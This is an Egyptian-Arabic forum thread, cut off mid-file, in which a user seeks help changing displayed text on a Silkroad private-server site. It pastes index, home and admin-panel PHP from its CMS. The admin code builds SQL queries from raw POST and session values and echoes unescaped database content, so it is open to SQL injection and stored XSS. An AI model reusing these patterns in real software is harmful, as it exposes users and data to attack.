عاوز واحد يكون خبير فى الsite ويحللى المشكله دي

[[KoTa]]

da al Home

كود PHP:

<a href="<?php echo $row[link];?>" class="span2">    







<!--=== End Slider ===-->

    <!--=== Purchase Block ===-->
<?php include ("module/news.php");?>

<!-- Modal -->
<div id="free4allmodal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Free for All Event Stats</h3>
  </div>
  <div class="modal-body">
    <p>Coming Soon<!--table class="table table-striped">
        <thead>
            <tr>
                <th>#</th>
                <th>Username</th>
                <th>Kills</th>
            </tr>
        </thead>
        <tbody>
            <tr>
                <td>1</td>
                <td>Zarathos</td>
                <td>23</td>
            </tr>
        </tbody>
    </table--></p>
  </div>
</div>
<!--/End modal -->

<!--=== Content Part ===-->
<div class="container">    
    <!-- Service Blocks -->
    <div class="row-fluid">
    
        <!-- Fortress war -->
<?php include ("ftw.php");?> 
       
        <!-- Server stats -->
<?php include ("status.php");?>  
     
        <!-- Job Balance -->
        <div class="span4">
    <div class="service clearfix">
        <i class="icon-tasks"></i>
        <div class="desc">
            <h4>Job Balance</h4>
            <p>Balance of current online Characters</p>
            <div class="progress">
              <div class="bar bar-success jb_tooltip" style="width: 20.3%;" data-toggle="tooltip" data-placement="bottom" title="20.3%">Thief</div>
              <div class="bar bar-warning jb_tooltip" style="width: 36.3%;" data-toggle="tooltip" data-placement="bottom" title="36.3%">Hunter</div>
              <div class="bar bar-danger jb_tooltip" style="width: 43.3%;" data-toggle="tooltip" data-placement="bottom" title="43.3%">Trader</div>
            </div>
        </div>
    </div>    
</div>        
    </div><!--/row-fluid-->    
    <!-- //End Service Blokcs -->
</div><!--/container-->        
<!-- End Content Part -->

we da el Indix

كود PHP:

<?php
require_once('config.inc.php');
require_once('core/core.inc.php');
global $core;
$core = new core();
core::$sql-> changeDB('acc');?><!DOCTYPE html>
<html lang="en"> 
<head>
    
    <title>Tttttttttttttr Sro<?php echo $core -> aConfig['Ttttttttttttttttttt']; ?></title>
    
    <!-- Meta -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="Keywords" content="silkroad, MMORPG, Free to play, f2p, hardcore mmorpg, Online game, free online mmorpg, Free game, Legend-road, SROZone, pc game, free download, download" />
    <meta name="Description" content="Silkroad Online is a World's first blockbuster Free to play MMORPG. Silkroad Olnine puts players deep into ancient Chinese, Islamic, and European civilization. Enjoy Silkroad's hardcore PvP, personal dungeon system, never ending fortress war and be the top of the highest heroes!" />

    <meta name="author" content="">

    <!-- CSS Global Compulsory-->
    <link rel="stylesheet" href="assets/plugins/bootstrap/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/style.css">
    <link rel="stylesheet" href="assets/css/headers/header1.css">
    <link rel="stylesheet" href="assets/plugins/bootstrap/css/bootstrap-responsive.min.css">
    <link rel="stylesheet" href="assets/css/style_responsive.css">
    <!-- CSS Implementing Plugins -->
    <link rel="stylesheet" href="assets/plugins/font-awesome/css/font-awesome.css">
    <link href="assets/plugins/glyphicons/css/glyphicons.css" rel="stylesheet">
    <link rel="stylesheet" href="assets/plugins/flexslider/flexslider.css" type="text/css" media="screen">        
    <link rel="stylesheet" href="assets/plugins/parallax-slider/css/parallax-slider.css" type="text/css">
    <!-- CSS Theme -->    
    <link rel="stylesheet" href="assets/css/themes/default.css" id="style_color">
    <link rel="stylesheet" href="assets/css/themes/headers/default.css" id="style_color-header-1">
    
    <link rel="shortcut icon" href="assets/img/favicon.ico" />
    
    <script src="ckeditor/ckeditor.js"></script>
</head>    
<body>
<!--=== Style Switcher ===-->    

<div class="style-switcher">
    <div class="theme-close"><i class="icon-remove"></i></div>
    <div class="theme-heading">Theme Colors</div>
    <ul class="unstyled">
        <li class="theme-default theme-active" data-style="default" data-header="light"></li>
        <li class="theme-blue" data-style="blue" data-header="light"></li>
        <li class="theme-orange" data-style="orange" data-header="light"></li>
        <li class="theme-red" data-style="red" data-header="light"></li>
        <li class="theme-light" data-style="light" data-header="light"></li>
    </ul>
    <div class="coming-soon-logo"><a href="index.html"><img src="assets/img/logo2-default.png" width="71" heigt="26" alt="" /></a></div>
</div><!--/style-switcher-->
<!--=== End Style Switcher ===-->    

<!--=== Top ===-->    
<div class="top">
    <div class="container">         
        <ul class="loginbar pull-right">
            <li><a href="<?php $data = $core -> aConfig; echo $data['forumLink'];?>" class="login-btn">Facebook</a></li>
                <li class="devider">&nbsp;</li>
            <li><a href="?pg=Contact" class="login-btn">Support</a></li>
        <?php if(isset($_SESSION['username'])) {
            $szAvatarUrl = user::getUserAvatarUrl($_SESSION['username']);?>
                <li class="devider">&nbsp;</li>
            <li><a href="" class="login-btn">
                Logged In As 
                <b><?php echo $_SESSION['username'];?></b>
                <?php echo "[<font color='red' title='Your Silk'><b>".user::getSilkByUsername($_SESSION['username'])."</b></font>]";?>
                <img width="40" height="40" src='<?php echo $szAvatarUrl;?>'></img></a>
            </li>
        <?php } else {?>
                <li class="devider">&nbsp;</li>
            <li><a href="?pg=Register" class="login-btn">Register</a></li>
        <?php } if(isset($_SESSION['username'])) {?>
                <li class="devider">&nbsp;</li>
            <li><a href="?pg=ucp&act=logout" class="login-btn">Logout</a></li>
        <?php } else {?>
                <li class="devider">&nbsp;</li>
            <li><a href="?pg=Login" class="login-btn">Login</a></li>
        <?php }?>
        </ul>
    </div>      
</div><!--/top-->
<!--=== End Top ===-->    

<!--=== Header ===-->
<div class="header">               
    <div class="container"> 
        <!-- Logo -->       
        <div class="logo">                                             
            
        </div><!-- /logo -->        
                                    
        <!-- Menu -->       
        <div class="navbar">                                
            <div class="navbar-inner">                                  
                <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                </a><!-- /nav-collapse -->                                  
                <div class="nav-collapse collapse">                                     
                    <ul class="nav top-2">
                        <li class="active"><a href="/">Home</a></li>
                        <li>
                            <a href="" class="dropdown-toggle" data-toggle="dropdown">Pages<b class="caret"></b></a>
                            <ul class="dropdown-menu">
                                <li><a href="?pg=Vision">The Vision</a></li>
                                <li><a href="?pg=Download">Downloads</a></li>
                                <li><a href="?pg=Team">Team</a></li>
                                <li><a href="?pg=Rules">Rules</a></li>
                                <li><a href="?pg=tos">Terms of Service</a></li>
                                <li><a href="?pg=FAQs">FAQs</a></li>
                                <li><a href="donate.php">Donate</a></li>
                            </ul>
                            <b class="caret-out"></b>                        
                        </li>
                        <li>
                            <a href="#" class="dropdown-toggle" data-toggle="dropdown">Rankings<b class="caret"></b></a>
                            <ul class="dropdown-menu">
                                <li><a href='?pg=rank&type=char'><span>Character Rankings</span></a></li>
                                <li><a href='?pg=rank&type=guild'><span>Guild Rankings</span></a></li>
                                <li><a href='?pg=rank&type=unique'><span>Unique Rankings</span></a></li>
                                <li><a href='?pg=rank&type=honor'><span>Honor Rank</span></a></li>
                                <li><a href='?pg=rank&type=job'><span>Job Rankings</span></a></li>
                                <li><a href='?pg=rank&type=set_plus'><span>Best Item</span></a></li>
                            </ul>
                            <b class="caret-out"></b>                        
                        </li>
                        <li>
                            <a href="#" class="dropdown-toggle" data-toggle="dropdown">Support<b class="caret"></b></a>
                            <ul class="dropdown-menu">
                                <li><a href="?pg=Contact">Contact</a></li>
                            </ul>
                            <b class="caret-out"></b>                        
                        </li>
                <?php if(isset($_SESSION['username'])) {?>
                        <li>
                            <a href="#" class="dropdown-toggle" data-toggle="dropdown">User Panel<b class="caret"></b></a>
                            <ul class="dropdown-menu">
<?php if(isset($_SESSION['username']))
    {
        if($core -> aConfig['allowChangePw'] == 1) echo "<li><a href='?pg=ucp&act=changepw'>Change password</a></li>";
        if($core -> aConfig['allowListChars'] == 1) echo "<li><a href='?pg=ucp&act=mychars'>My characters</a></li>";
        if($core -> aConfig['allowMyProfile'] == 1) echo "<li><a href='?pg=ucp&act=myprofile'>My profile</a></li>";
        if($core -> aConfig['allowRefferals'] == 1) echo "<li><a href='?pg=ucp&act=refferals'>My refferals</a></li>";
        echo "<li><a href='?pg=emailreplace'>Change Email</a></li>";
        if($core -> aConfig['allowMailbox'] == 1) 
    {
    echo "<li><a href='?pg=ucp&act=mailbox'>Mailbox ";
    $myJID = user::accountJIDbyUsername($_SESSION['username']);

    $nMsgCountUnread =core::$sql -> numRows("select * from srcms_privatemessages where receiver='$myJID' and viewed='0'");
    $nMsgCountRead = core::$sql -> numRows("select * from srcms_privatemessages where receiver='$myJID' and viewed='1'");
    $nMsgCount = core::$sql -> numRows("select * from srcms_privatemessages where receiver='$myJID'");

    $msgText = "";

    if($nMsgCountUnread > 0)
    {
    $msgText = "[<b>$nMsgCount / ".$core -> aConfig['maxPrivMsg']."]</a></b>";
    }
    else $msgText = "[$nMsgCount / ".$core -> aConfig['maxPrivMsg']."]</a></li>";
    }

    echo "$msgText";
    }?>
                            </ul>
                            <b class="caret-out"></b>                        
                        </li>
                <?php } 
                    if(user::isAdmin($_SESSION['username']))
                        {?>
                        <li>
                            <a href="#" class="dropdown-toggle" data-toggle="dropdown">Admin Panel<b class="caret"></b></a>
                            <ul class="dropdown-menu">                                
                                <li><a href='?pg=admin&act=news'>News</a></li>
                                <li><a href='?pg=admin&act=dl'>Downloads</a></li>
                                <li><a href='?pg=admin&act=settings'>Edit Settings</a></li>
                            </ul>
                            <b class="caret-out"></b>                        
                        </li>
                <?php   }?>
                        <li><a class="search"><i class="icon-search search-btn"></i></a></li>                               
                    </ul>
                    <div class="search-open">
                        <div class="input-append">
                            <form method="post" action="?pg=rank&type=search_guild">
                                <input type="text" class="span3" type='text' name='search_for' maxlength='16' placeholder='Search Guild' />
                                <button type="submit" class="btn-u" name='submit' value='Search'>Search</button>
                            </form>
                            <form method="post" action="?pg=rank&type=search_char">
                                <input type="text" class="span3" type='text' name='searchfor' maxlength='16' placeholder='Search Character' />
                                <button type="submit" class="btn-u" name='submit' value='Search'>Search</button>
                            </form>
                        </div>
                    </div>
                </div><!-- /nav-collapse -->                                
            </div><!-- /navbar-inner -->
        </div><!-- /navbar -->                          
    </div><!-- /container -->               
</div><!--/header -->      
<!--=== End Header ===-->

<?php $core -> showMainContent(); ?>

<!--=== Footer ===-->
<div class="footer">
    <div class="container">
        <div class="row-fluid">
            <div class="span4">
    <!-- <a href="http://www.elitepvpers.com"><img src="banners/epvpers.png" /></a></p>-->

    <div class="headline"><h3><a href="http://www.elitepvpers.com"><img src="banners/epvpers.png" /></a></p></h3></div>    
    

<!--=== End Footer ===-->


<!--=== Copyright ===-->

<!--=== End Copyright ===-->

<!-- JS Global Compulsory -->            
<script type="text/javascript" src="assets/js/jquery-1.8.2.min.js"></script>
<script type="text/javascript" src="assets/js/modernizr.custom.js"></script>        
<script type="text/javascript" src="assets/plugins/bootstrap/js/bootstrap.min.js"></script>    
<!-- JS Implementing Plugins -->           
<script type="text/javascript" src="assets/plugins/flexslider/jquery.flexslider-min.js"></script>
<script type="text/javascript" src="assets/plugins/parallax-slider/js/modernizr.js"></script>
<script type="text/javascript" src="assets/plugins/parallax-slider/js/jquery.cslider.js"></script> 
<script type="text/javascript" src="assets/plugins/back-to-top.js"></script>
<!-- JS Page Level -->           
<script type="text/javascript" src="assets/js/app.js"></script>
<script type="text/javascript" src="assets/js/pages/index.js"></script>
<script type="text/javascript">
    jQuery(document).ready(function() {
          App.init();
        App.initSliders();
        Index.initParallaxSlider();
    });
</script>
<script language="javascript" type="text/javascript"> 
function toggleSlideBox(x) {
        if ($('#'+x).is(":hidden")) {
            //$(".sourceBox").slideUp(200);
            $('#'+x).slideDown(300);
        } else {
            $('#'+x).slideUp(300);
        }
}
</script>

</body>
</html>    
<!-- Performance optimized by eCarrera
    Served from: Legend-Road.com @  March 05, 2014 08:45:12 by eCarrera Total Cache -->

اغير انهي بقا علاشان تتغير الكلمه دى

عفوا ,,, لايمكنك مشاهده الروابط لانك غير مسجل لدينا [ للتسجيل اضغط هنا ]

[محمد منتصر]

دور ف التيكستات الل عندك كلها هتلاقيها اكيد يعني هيا مش ف دول ممكن تكون ف ملف css ومعمول للملف stylesheet عادي يعني بس غالبا هتلاقيها ف ملف php عشان دي Status

[[KoTa]]

والله ملقيها

[Dev.Ri3o]

الصورة مش باينة ارجو اعادة الرفع

[[KoTa]]

Done

[Dev.Ri3o]

هى ممكن متكنش فى ال Index او ال HomePage بص ارفع كل ملفات ال txt اللى فى ملف ال mod

[[KoTa]]

admin

كود PHP:

<?php
$userRank = core::$sql->getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($_SESSION[username])."'");
if($userRank != "admin")
{
    echo "NOT ADMIN";
    return;
}

switch($_GET['act'])
{
    case('news'):
        if(!isset($_GET['subact']))
        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">News</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">News</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">            
        <div class="span9">
<ul class="unstyled">
    <li><i class="icon-plus-sign color-green"></i> <a href='?pg=admin&act=news&subact=add'><b>Add</b></a></li>
    <li><i class="icon-remove-sign color-green"></i> <a href='?pg=admin&act=news&subact=del'><b>Delete</b></a></li>
    <li><i class="icon-edit color-green"></i> <a href='?pg=admin&act=news&subact=edit'><b>Edit</b></a></li>
</ul>
        </div><!--/span4-->                    
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
        <?php }
        else
        {
            switch($_GET['subact'])
            {
                case('add'):
                    if(!isset($_POST['submit']) && !isset($_POST['title']))
                    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Add News</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Add News</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post" role="form">
                <h3>Add News</h3>
                    <div class="controls">
                        <label>Title<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                            <input type="text" name="title" autocomplete="off" maxlength="16" placeholder="Title" style="width: 165%" class=""/>
                        </div>
                            
                        <label>Message<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <textarea name="textBox" id="textBox" placeholder="Title"></textarea>
                      </div>
                    </div>

                    <div class="controls form-inline">
                        <?php echo misc::back();?>
                        <input type="submit" name="submit" class="btn-u pull-right" value="Add">
                    </div>
                </form>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
<script>CKEDITOR.replace('textBox');</script>
                    <?php }
                    else
                    {
                        $szTitle = security::toHTML($_POST['title']);
                        //$szText = misc::applyAttributesToText($_POST['textBox']);
                        $szText = stripslashes(security::toHTML($_POST['textBox']));
                        
                        core::$sql -> exec("insert into srcms_news(title,content,author,time) values('$szTitle','$szText','$_SESSION[username]','".misc::getDateTime()."')");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Add News</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Add News</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
    <div class="container">        
        <div class="row-fluid margin-bottom-10">
<?php
    echo "News article added.<br/>";
    misc::redirect('?pg=admin&act=news', 1);
?>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                    <?php }
                break;
                
                case('del'):
                        if(isset($_GET['id']))
                        {
                            $nID = (int)$_GET['id'];
                            if(core::$sql -> numRows("select * from srcms_news where id='$nID'") > 0)
                            {
                                core::$sql -> exec("delete from srcms_news where id='$nID'");
                                core::$sql -> exec("delete from srcms_newscomments where newsID='$nID'");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Article deleted</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Article deleted</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
<?php
    echo "News article deleted.<br/>";
    misc::redirect('?pg=admin&act=news&subact=del',3);
?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                                <?php break;
                            }
                            else
                            {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Article deleted</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Article deleted</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
    <div class="container">        
        <div class="row-fluid margin-bottom-10">
<?php
    echo " You can't delete article that does not exist.<br/>";
    misc::redirect('?pg=admin&act=news&subact=del',3);
?>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                            <?php }
                        }
                        
                        if(!isset($_POST['submit']) && !isset($_GET['id']))
                        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Add News</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Add News</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
    <div class="container">        
        <div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td>ID</td>
        <td>Title</td>
        <td>Author</td>
        <td>Time</td>
        <td>Action</td>
    <tr/>
                            <?php $hNewsArticles = core::$sql -> exec("select * from srcms_news");
                            if(core::$sql -> numRows("select * from srcms_news") == 0)
                            {?>
No news added yet<br/>
                            <?php }
                            else
                            {
                                while($row = mssql_fetch_array($hNewsArticles))
                                    {?>
    <tr>
        <td><?php echo $row[id];?></td>
        <td><?php echo $row[title];?></td>
        <td><?php echo $row[author];?></td>
        <td><?php echo $row[time];?></td>
        <td><?php echo misc::back();?>&nbsp;&nbsp;<a href='?pg=admin&act=news&subact=del&id=<?php echo $row[id];?>' class="btn-u">Delete</a>
    <tr/>
                                <?php
                                    }
                            }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                        <?php }
                break;
                
                case('edit'):
                        if(!isset($_POST['submit']) && !isset($_GET['id']))
                        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Add News</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Add News</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
    <div class="container">        
        <div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td>ID</td>
        <td>Title</td>
        <td>Author</td>
        <td>Time</td>
        <td>Action</td>
    <tr/>
                            <?php $hNewsArticles = core::$sql -> exec("select * from srcms_news");
                                if(mssql_num_rows($hNewsArticles) == 0)
                                {?>
No news added yet<br/>
                            <?php }
                                else
                                {
                                    while($row = mssql_fetch_array($hNewsArticles))
                                    {?>
    <tr>
        <td><?php echo $row[id];?></td>
        <td><?php echo $row[title];?></td>
        <td><?php echo $row[author];?></td>
        <td><?php echo $row[time];?></td>
        <td><?php echo misc::back();?>&nbsp;&nbsp;<a href='?pg=admin&act=news&subact=edit&id=<?php echo $row[id];?>' class="btn-u">Edit</a></td>
    <tr/>
                                <?php
                                    }
                                }?>
</table>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                        <?php }
                        else
                        {
                            $nID = (int)$_GET['id'];
                            if(core::$sql -> numRows("select * from srcms_news where id='$nID'") == 0)
                            {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Article deleted</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Article deleted</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
    <div class="container">        
        <div class="row-fluid margin-bottom-10">
<?php
    echo " You can't edit article that does not exist.<br/>";
    misc::redirect('?pg=admin&act=news&subact=del',3);
?>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                            <?php }
                            else
                            {
                                if($_POST['submit'] != 'Save')
                                {
                                    $hArticleData = core::$sql -> exec("select * from srcms_news where id='$nID'");
                                    $hArticleData = mssql_fetch_array($hArticleData);?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Edit News(<?php echo $hArticleData[title];?>)</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Edit News</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
    <div class="container">        
        <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post" role="form">
                <h3>Edit News(<?php echo $hArticleData[title];?>)</h3>
                    <div class="controls">
                        <label>Title<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                            <input type="text" name="title" autocomplete="off" maxlength="16" style="width: 165%" value="<?php echo $hArticleData[title];?>"/>
                        </div>
                            
                        <label>Message<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <textarea name="textBox" id="textBox"> <?php echo $hArticleData[content];?></textarea>
                      </div>
                    </div>

                    <div class="controls form-inline">
                        <?php echo misc::back();?>
                        <input type="submit" name="submit" class="btn-u pull-right" value="Save">
                    </div>
                </form>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
<script>CKEDITOR.replace('textBox');</script>
                                <?php }
                                else
                                {
                                    $szTitle = security::toHTML($_POST['title']);
                                    $szText = stripslashes(security::toHTML($_POST['textBox']));
                                    core::$sql -> exec("update srcms_news set title='$szTitle',content='$szText' where id='$nID'");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Article deleted</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Article deleted</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
    <div class="container">        
        <div class="row-fluid margin-bottom-10">
<?php
    echo "News article edited.<br/>";
    misc::redirect('?pg=admin&act=news&subact=edit',3);
?>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                                <?php }
                            }
                        }
                break;
                
                
                default:
                    echo "Unknown subaction";
                    break;
            }
            #echo "<br/>";misc::back();
        }
    break;
    
    case('dl'):
        if(!isset($_GET['subact']))
        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Download</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Download</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">            
        <div class="span9">
<ul class="unstyled">
    <li><i class="icon-plus-sign color-green"></i> <a href='?pg=admin&act=dl&subact=add'><b>Add</b></a></li>
    <li><i class="icon-remove-sign color-green"></i> <a href='?pg=admin&act=dl&subact=del'><b>Delete</b></a></li>
    <li><i class="icon-edit color-green"></i> <a href='?pg=admin&act=dl&subact=edit'><b>Edit</b></a></li>
</ul>
        </div><!--/span4-->                    
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
        <?php }
        else
        {
            switch($_GET['subact'])
            {
                case('add'):
                    if(!isset($_POST['submit']) && !isset($_POST['link']))
                    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Add Download</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Add Download</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
        <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post" role="form">
                <h3>Add Download</h3>
                    <div class="controls">
                        <label>Uploaded on<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                            <input type="text" name="name" autocomplete="off" maxlength="16" placeholder="Example: MEGA" style="width: 165%" class=""/>
                        </div>
                        
                        <label>Link<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                            <input type="text" name="link" autocomplete="off" maxlength="16" placeholder="Download Link" style="width: 165%" class=""/>
                        </div>
                        
                        <label>Name/Time<span class="color-red">*</span></label>
                        <div class="input-prepend">
                            <span class="add-on"><i class="icon-hand-right color-green"></i></span>
                            <input type="text" name="description" autocomplete="off" maxlength="16" placeholder="Example: Full Client Official (06/02/2014)" style="width: 165%" class=""/>
                        </div>
                    </div>

                    <div class="controls form-inline">
                        <?php echo misc::back();?>
                        <input type="submit" name="submit" class="btn-u pull-right" value="Add">
                    </div>
                </form>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                    <?php }
                    else
                    {
                        $szName = security::toHTML($_POST['name']);
                        $szDesc = security::toHTML($_POST['description']);
                        
                        if(!security::isValidUrl($_POST['link']))
                        {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Add Download</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Add Download</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
        <div class="row-fluid margin-bottom-10">
        Invalid URL <?php echo misc::back();?>
       </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                            <?php break;
                        }
                        else
                        {
                            core::$sql -> exec("insert into srcms_downloads(name,link,description) values('$szName','$_POST[link]','$szDesc')");?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Add Download</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Add Download</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
        Successfully added link to downloads. <?php echo misc::redirect('?pg=admin&act=dl',3);?>
    </div><!--/row-fluid-->
</div><!--/container-->            
<!--=== End Content Part ===-->
                        <?php }
                    }
                break;
                
                case('del'):
                    if(!isset($_POST['submit']) && !isset($_GET['id']))
                    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Download Link</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Download Link</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid margin-bottom-10">
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td>ID</td>
        <td>Uploaded on</td>
        <td>Link</td>
        <td>Name/Time</td>
